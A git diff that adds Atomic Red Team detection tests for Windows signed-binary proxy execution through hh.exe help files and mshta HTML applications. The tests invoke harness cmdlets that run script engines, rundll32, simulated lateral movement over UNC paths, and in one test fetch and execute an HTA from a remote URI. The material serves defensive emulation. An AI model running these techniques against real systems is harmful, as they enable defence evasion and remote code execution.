diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml index 9ef61e03..e73024c3 100644 --- a/atomics/T1218.001/T1218.001.yaml +++ b/atomics/T1218.001/T1218.001.yaml @@ -43,3 +43,152 @@ atomic_tests: hh.exe #{remote_chm_file} name: command_prompt +- name: Invoke CHM with default Shortcut Command Execution + auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 + description: Executes a CHM file with the default Shortcut Command method. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + hh_file_path: + description: path of modified HH.exe + type: path + default: $env:windir\hh.exe + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + +- name: Invoke CHM with InfoTech Storage Protocol Handler + auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 + description: Executes a CHM file with the ITS protocol handler. + supported_platforms: + - windows + input_arguments: + hh_file_path: + description: path of modified HH.exe + type: path + default: $env:windir\hh.exe + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + +- name: Invoke CHM Simulate Double click + auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a + description: Executes a CHM file simulating a user double click. + supported_platforms: + - windows + input_arguments: + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' + name: powershell + +- name: Invoke CHM with Script Engine and Help Topic + auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5 + description: Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension. + supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: $env:windir\hh.exe + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + script_engine: + description: Default Script Engine + type: string + default: JScript + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell + +- name: Invoke CHM Shortcut Command with ITS and Help Topic + auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 + description: Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + supported_platforms: + - windows + input_arguments: + topic_extension: + description: Default Help Topic + type: string + default: html + hh_file_path: + description: path of modified HH.exe + type: path + default: $env:windir\hh.exe + infotech_storage_handler: + description: Default InfoTech Storage Protocol Handler + type: string + default: its + chm_file_path: + description: Default path of CHM + type: string + default: Test.chm + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' + name: powershell \ No newline at end of file diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 7b35e97e..077398a1 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -18,6 +18,18 @@ Mshta.exe can be used to bypass application control solutions that do not accoun - [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta) +- [Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement](#atomic-test-4---invoke-html-application---jscript-engine-over-local-unc-simulating-lateral-movement) + +- [Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click](#atomic-test-5---invoke-html-application---jscript-engine-simulating-double-click) + +- [Atomic Test #6 - Invoke HTML Application - Direct download from URI](#atomic-test-6---invoke-html-application---direct-download-from-uri) + +- [Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler](#atomic-test-7---invoke-html-application---jscript-engine-with-rundll32-and-inline-protocol-handler) + +- [Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler](#atomic-test-8---invoke-html-application---jscript-engine-with-inline-protocol-handler) + +- [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path) +
@@ -109,4 +121,270 @@ remove-item "#{temp_file}" -ErrorAction Ignore +
+
+ +## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement +Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| script_engine | Script Engine to use | string | JScript| +| hta_file_path | HTA file name and or path to be used | string | Test.hta| +| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click +Executes an HTA Application using JScript script engine simulating double click. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| script_engine | Script Engine to use | string | JScript| +| hta_file_path | HTA file name and or path to be used | string | Test.hta| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #6 - Invoke HTML Application - Direct download from URI +Executes an HTA Application by directly downloading from remote URI. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| +| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler +Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe| +| script_engine | Script Engine to use | string | JScript| +| protocol_handler | Protocol Handler to use | string | About| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler +Executes an HTA Application with JScript Engine and Inline Protocol Handler. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| +| script_engine | Script Engine to use | string | JScript| +| protocol_handler | Protocol Handler to use | string | About| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + + +
+
+ +## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path +Executes an HTA Application with Simulate lateral movement over UNC Path. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. +##### Check Prereq Commands: +```powershell +$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable +if (-not $RequiredModule) {exit 1} +if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +``` + + + +
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml index 6cc6af2c..84790d0a 100644 --- a/atomics/T1218.005/T1218.005.yaml +++ b/atomics/T1218.005/T1218.005.yaml @@ -50,4 +50,168 @@ atomic_tests: mshta "#{temp_file}" cleanup_command: | remove-item "#{temp_file}" -ErrorAction Ignore + name: powershell + +- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement + auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 + description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. + supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + mshta_file_path: + description: Location of mshta.exe + type: string + default: $env:windir\system32\mshta.exe + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}' + name: powershell + +- name: Invoke HTML Application - Jscript Engine Simulating Double Click + auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 + description: Executes an HTA Application using JScript script engine simulating double click. + supported_platforms: + - windows + input_arguments: + script_engine: + description: Script Engine to use + type: string + default: JScript + hta_file_path: + description: HTA file name and or path to be used + type: string + default: Test.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick' + name: powershell + +- name: Invoke HTML Application - Direct download from URI + auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db + description: Executes an HTA Application by directly downloading from remote URI. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: $env:windir\system32\mshta.exe + hta_uri: + description: URI to HTA + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}' + name: powershell + +- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler + auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af + description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. + supported_platforms: + - windows + input_arguments: + rundll32_file_path: + description: Location of rundll32.exe + type: string + default: $env:windir\system32\rundll32.exe + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}' + name: powershell + +- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler + auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + description: Executes an HTA Application with JScript Engine and Inline Protocol Handler. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: $env:windir\system32\mshta.exe + script_engine: + description: Script Engine to use + type: string + default: JScript + protocol_handler: + description: Protocol Handler to use + type: string + default: About + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}' + name: powershell + +- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path + auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 + description: Executes an HTA Application with Simulate lateral movement over UNC Path. + supported_platforms: + - windows + input_arguments: + mshta_file_path: + description: Location of mshta.exe + type: string + default: $env:windir\system32\mshta.exe + dependencies: + - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module. + prereq_command: |- + $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force + executor: + command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' name: powershell \ No newline at end of file diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 9123d06f..e4d70e0f 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -578,3 +578,18 @@ da75ae8d-26d6-4483-b0fe-700e4df4f037 342cc723-127c-4d3a-8292-9c0c6b4ecadc 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 +14920ebd-1d61-491a-85e0-fe98efe37f25 +cbbff285-9051-444a-9d17-c07cd2d230eb +e9f2b777-3123-430b-805d-5cedc66ab591 +2988133e-561c-4e42-a15f-6281e6a9b2db +29d6f0d7-be63-4482-8827-ea77126c1ef7 +b4094750-5fc7-4e8e-af12-b4e36bf5e7f6 +5decef42-92b8-4a93-9eb2-877ddcb9401a +4f83adda-f5ec-406d-b318-9773c9ca92e5 +15756147-7470-4a83-87fb-bb5662526247 +007e5672-2088-4853-a562-7490ddc19447 +58a193ec-131b-404e-b1ca-b35cf0b18c33 +39ceed55-f653-48ac-bd19-aceceaf525db +e7e3a525-7612-4d68-a5d3-c4649181b8af +d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 +b8a8bdb2-7eae-490d-8251-d5e0295b2362